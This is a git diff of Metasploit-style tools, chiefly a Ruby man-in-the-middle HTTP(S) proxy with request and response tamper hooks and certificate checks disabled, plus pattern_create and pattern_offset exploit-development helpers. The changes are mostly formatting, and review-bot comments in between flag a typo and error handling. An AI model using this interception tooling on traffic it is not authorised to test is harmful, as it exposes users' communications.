nil +end + +turl = nil $args.parse(ARGV) { |opt, idx, val| case opt when "-d" 
@@ -540,30 +543,30 @@ $args.parse(ARGV) { |opt, idx, val| when "-u" $useproxy = true when "-v" - $verbose = true + $verbose = true when "-x" $proxyhost = val when "-p" - $proxyposrt = val + $proxyposrt = val when "-h" puts("\n" + " Usage: #{$0} \n" + $args.usage) exit end -} +} if $crun uri = URI.parse(turl) tssl = (uri.scheme == "https") ? true : false - - if (uri.host.nil? or uri.host.empty?) + + if (uri.host.nil? or uri.host.empty?) puts "Error: target http(s)://target/path" exit end - + if $useproxy - puts "Using proxy: #{$proxyhost}:#{$proxyport}" + puts "Using proxy: #{$proxyhost}:#{$proxyport}" end - + mc = HttpCrawler.new(uri.host,uri.port,uri.path,tssl,$proxyhost, $proxyport, $useproxy) if $dbs puts "Database: #{$dbpathmsf}" @@ -576,10 +579,10 @@ if $crun end puts "Target: #{mc.ctarget} Port: #{mc.cport} Path: #{mc.cinipath} SSL: #{mc.cssl}" - mc.run + mc.run end - - - + + + diff --git a/tools/msfproxy.rb b/tools/msfproxy.rb index 8cae684971..3e1f23b9b0 100755 --- a/tools/msfproxy.rb +++ b/tools/msfproxy.rb @@ -1,8 +1,11 @@ #!/usr/bin/env ruby # -# MITM proxy. +# $Id$ +# +# MITM proxy. # # Author: et [at] metasploit.com 2009 +# $Revision$ # # openssl before rubygems mac os @@ -16,7 +19,7 @@ begin rescue LoadError puts "Error: sqlite3-ruby not found" end - + msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) @@ -55,7 +58,7 @@ module HttpProxy def initialize @isssl = false @sslconnectdone = false - + if $modulepname m = ::Module.new begin @@ -64,7 +67,7 @@ module HttpProxy mname = $1 klass = m.const_get("Tamper#{mname}") $modclass = klass.new() - + #puts("Loaded proxy module #{mname} from #{$modulepname}...") end rescue ::Exception => e 
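Review bot: `$proxyposrt = val` under `when "-p"` is a typo that survives the rewrite of that line: the variable read later in this same hunk is `$proxyport` (in the `Using proxy:` message and in the `HttpCrawler.new(...)` call), so `-p` never actually sets the proxy port. The line should read `$proxyport = val`. The `$args.parse` block starts outside this hunk.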
@@ -73,10 +76,10 @@ module HttpProxy end end end - + def post_init if $printcon - client = Socket.unpack_sockaddr_in(get_peername) + client = Socket.unpack_sockaddr_in(get_peername) puts "Received a new connection from #{client.last}:#{client.first}" end # @@ -86,7 +89,7 @@ module HttpProxy start_tls end end - + def get_first_line(data) # # Just the first line @@ -96,64 +99,64 @@ module HttpProxy firstline = line.chomp break end - + return firstline end - - def parse_target_array(target,ssl) + + def parse_target_array(target,ssl) tarr = [] - - # + + # # Clean garbage from target string and return [host,port,pathquery] # puri = target.sub(/^https:\/+|^http:\/+/,"") ppath = puri.scan(/\/.+|\//) tarr = puri.sub(/\/.+|\//,"").split(/:/) - + if !tarr[1] if ssl tarr[1] = 443 else tarr[1] = 80 - end + end end - + if ppath[0] tarr[2] = ppath[0] else tarr[2] = "/" - end + end return tarr end - + def receive_data(data) firstlinearray=[] - + # # Just for transparent mode # - if $tmode + if $tmode @sslconnectdone = true @isssl = true end - + if !@sslconnectdone firstlinestr = get_first_line(data) firstlinearray = firstlinestr.split(" ") else - @isssl = true + @isssl = true end - + if !@isssl @targethost,@targetport,@targetpathquery = parse_target_array(firstlinearray[1], @usessl) - if firstlinearray[0] and firstlinearray[0].include?("CONNECT") + if firstlinearray[0] and firstlinearray[0].include?("CONNECT") send_data "HTTP/1.0 200 Connection established\r\n\r\n" #start_tls(:verify_peer => false) start_tls @sslconnectdone = true else # - # Adjust host:port/pathquery for /pathwuery on nonssl connection + # Adjust host:port/pathquery for /pathwuery on nonssl connection # data["#{firstlinestr}"] = "#{firstlinearray[0]} #{@targetpathquery} #{firstlinearray[2]}" if data.include? firstlinestr handle_connection(data,@isssl) 
@@ -164,75 +167,75 @@ module HttpProxy # if $tmode dumbstr ="" - @targethost,@targetport,dumbstr = parse_target_array($ttarget, $tssl) + @targethost,@targetport,dumbstr = parse_target_array($ttarget, $tssl) handle_connection(data,$tssl) else handle_connection(data,@isssl) end end - end - + end + def handle_connection(request,usingssl) if $printreq p "REQUEST: #{request}" end - + # Use Rex::Proto::Http::Request to use # evasion techniques and allow to manipulate # request easily. - + modreq = Rex::Proto::Http::Request.new case modreq.parse(request) when Rex::Proto::Http::Packet::ParseCode::Completed - + # REQUEST INJECTION POINT if $modclass modreq = $modclass.tamper_request(modreq,usingssl) end # Done with user mods. - + if modreq.headers['Proxy-Connection'] modreq.headers['Connection'] = 'close' modreq.headers.delete('Proxy-Connection') - end - + end + # Uncomment this line if you want to see clear text i.e. gzip #modreq.headers.delete('Accept-Encoding') - - # Adjust parsed request to httpclient - method = modreq.method - - uri = "http://" + + # Adjust parsed request to httpclient + method = modreq.method + + uri = "http://" if usingssl uri = "https://" end - - uritarget = "" + + uritarget = "" uritarget << "#{@targethost}:#{@targetport}#{modreq.resource}" uri << uritarget - + query = modreq.qstring - body = modreq.body #modreq.data? + body = modreq.body #modreq.data? extheader = modreq.headers - - # + + # # Using httpclient so not to deal with rebuilding a ruby http client - # + # c = HTTPClient.new if usingssl c.ssl_config.verify_mode = OpenSSL::SSL::VERIFY_NONE end - + begin # Send Request resp = c.request(method, uri, query, body, extheader) - + respstr = "HTTP/#{resp.version} " respstr << resp.status.to_s respstr << " " respstr << resp.reason respstr << "\r\n" - + hr = resp.header.all headstr = "" hr.collect { |var, val| 
@@ -242,11 +245,11 @@ module HttpProxy headstr << "#{var}: #{val.to_s}\r\n" end } - headstr << "\r\n" + headstr << "\r\n" respstr << headstr respstr << resp.content - if $printstatus + if $printstatus puts "[-] #{resp.status.to_s}\t#{@targethost}\t#{modreq.resource}\t#{modreq.method} #{resp.content.length}" end # @@ -258,29 +261,29 @@ module HttpProxy if usingssl sslint = 1 end - + strq = "" modreq.qstring.each_pair do |k,v| if strq.empty? strq = k + "=" + v else - strq = k + "=" + v + "&"+ strq + strq = k + "=" + v + "&"+ strq end end - - + + # Using $db as connection Thread.new{ until !$db.transaction_active? puts "Waiting for db" #wait end - - $db.transaction $db.execute( "insert into wmap_requests values ( ?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", + + $db.transaction $db.execute( "insert into wmap_requests values ( ?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", nil, @targethost, @targethost, - @targethost, + @targethost, @targetport, sslint, modreq.method, 
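Review bot: The `Thread.new{ … }.join` wrapper around the `$db.transaction` / `$db.execute` insert is joined immediately, so the insert still runs synchronously inside `receive_data` and the thread only obscures that; the preceding `until !$db.transaction_active?` loop is a busy-wait that prints `Waiting for db` on every spin. Drop the thread wrapper and, if the wait is really needed, put a short `sleep` inside the loop so it does not spin the CPU and flood the console. The `$db.execute` call itself uses bound `?` placeholders, which is the right way to build that insert.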
@@ -293,43 +296,43 @@ module HttpProxy SQLite3::Blob.new(resp.content), Time.new ) - + $db.commit - }.join + }.join end - # + # # Response # - + # RESPONSE INJECTION POINT if $modclass respstr = $modclass.tamper_response(respstr,usingssl) end # Done with user mods. - + if $printres p "RESPONSE: #{respstr}" - end - - # Send response to client + end + + # Send response to client send_data respstr - + rescue HTTPClient::ConnectTimeoutError => exc - # Can configure connection timeout via HTTPClient#connect_timeout=. + # Can configure connection timeout via HTTPClient#connect_timeout=. puts "Error: ConnectTimeoutError to #{@targethost}: #{exc.message}" rescue HTTPClient::ReceiveTimeoutError => exc - # Can configure connection timeout via HTTPClient#receive_timeout=. + # Can configure connection timeout via HTTPClient#receive_timeout=. puts "Error: ReceiveTimeoutError to #{@targethost}: #{exc.message}" - end + end when Rex::Proto::Http::Packet::ParseCode::Error p "Parsing Error!!!" - end + end unbind end - + def unbind - self.close_connection_after_writing + self.close_connection_after_writing end end @@ -338,7 +341,7 @@ def usage exit end -trap("INT") { +trap("INT") { exit() } 
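Review bot: The `rescue` chain at the end of the request `begin` handles only `HTTPClient::ConnectTimeoutError` and `HTTPClient::ReceiveTimeoutError`, so a refused connection, a DNS failure or a TLS handshake error from `c.request` propagates out of `handle_connection`, and since this runs from EventMachine's `receive_data` the client presumably never gets a response and `unbind` is not reached. Add a catch-all after the two specific clauses, `rescue => exc` followed by `puts "Error: #{exc.class} to #{@targethost}: #{exc.message}"`, so the connection is still closed cleanly. The `begin` opens in the previous hunk.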
@@ -347,15 +350,15 @@ $args = Rex::Parser::Arguments.new( "-b" => [ false, "Print responses: Default false" ], "-c" => [ false, "Print connection message: Default false"], "-u" => [ false, "Print status: Default false"], - "-v" => [ false, "Print requests and responses: Default false" ], + "-v" => [ false, "Print requests and responses: Default false" ], "-i" => [ true, "Listening IP address. Default 0.0.0.0" ], "-p" => [ true, "Listening proxy port. Default 8080" ], "-d" => [ false, "Store requests to Metasploit database" ], - "-w" => [ true, "Metasploit database path" ], + "-w" => [ true, "Metasploit database path" ], "-t" => [ true, "Transparent mode. http(s)://host:port." ], "-m" => [ true, "Load module. path/module.rb."], "-h" => [ false, "Display this help information" ]) - + $args.parse(ARGV) { |opt, idx, val| case opt when "-a" @@ -365,20 +368,20 @@ $args.parse(ARGV) { |opt, idx, val| when "-c" $printcon = true when "-u" - $printstatus = true + $printstatus = true when "-v" $printreq = true $printres = true - $printcon = true - when "-d" + $printcon = true + when "-d" $storedb = true puts "Storing requests in #{$storedbpath}." $db = SQLite3::Database.new($storedbpath) - when "-w" + when "-w" $storedbpath = val $storedb = true puts "Storing requests in #{$storedbpath}." - $db = SQLite3::Database.new($storedbpath) + $db = SQLite3::Database.new($storedbpath) when "-i" defaultip = val when "-m" @@ -391,15 +394,15 @@ $args.parse(ARGV) { |opt, idx, val| puts "Transparent mode: #{$ttarget}" if $ttarget.include?("https://") $tssl = true - end + end when "-h" usage end -} +} EventMachine::run { puts "SSL Support: #{EM.ssl?}." - + EM.epoll EM::start_server(defaultip, defaultport, HttpProxy) puts "Listening on #{defaultip} port #{defaultport}." diff --git a/tools/nasm_shell.rb b/tools/nasm_shell.rb index 356ea07ae8..262539a8c8 100755 --- a/tools/nasm_shell.rb +++ b/tools/nasm_shell.rb 
@@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This tool provides an easy way to see what opcodes are associated with # certain x86 instructions by making use of nasm if it is installed and # reachable through the PATH environment variable. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib')) diff --git a/tools/pattern_create.rb b/tools/pattern_create.rb index 7c0c5de2f1..ea7631919c 100755 --- a/tools/pattern_create.rb +++ b/tools/pattern_create.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib')) @@ -13,4 +17,4 @@ end # sets. sets = ARGV.length > 0 ? ARGV : Rex::Text::DefaultPatternSets -puts Rex::Text.pattern_create(length.to_i, sets) \ No newline at end of file +puts Rex::Text.pattern_create(length.to_i, sets) diff --git a/tools/pattern_offset.rb b/tools/pattern_offset.rb index ac062dc4e5..0ddc0bd6d3 100755 --- a/tools/pattern_offset.rb +++ b/tools/pattern_offset.rb @@ -1,4 +1,6 @@ #!/usr/bin/env ruby +# $Id$ +# $Revision$ $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))